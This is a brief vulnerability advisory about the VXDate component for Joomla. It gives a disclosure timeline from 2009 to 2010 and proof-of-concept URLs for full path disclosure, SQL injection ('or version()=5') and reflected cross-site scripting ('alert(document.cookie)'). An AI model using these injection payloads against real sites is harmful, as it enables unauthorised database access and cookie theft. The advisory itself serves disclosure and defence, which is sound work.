1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
------------------------------------------------------------------------------------------------------------- I want to warn you about vulnerabilities in component VXDate for Joomla. ----------------------------- Advisory: Vulnerabilities in VXDate for Joomla ----------------------------- URL: http://websecurity.com.ua/3849/ ----------------------------- Timeline: 10.05.2009 - found the vulnerabilities. 12.01.2010 - announced at my site. 18.01.2010 - informed developers. 13.03.2010 - disclosed at my site. ----------------------------- Details: These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities. Full path disclosure: http://site/index.php?option=com_vxdate&ct=’ http://site/index.php?option=com_vxdate&ct=1&md=details&id=’ http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’ SQL Injection: http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5 http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5 XSS: http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E Vulnerable are potentially all versions of VXDate. |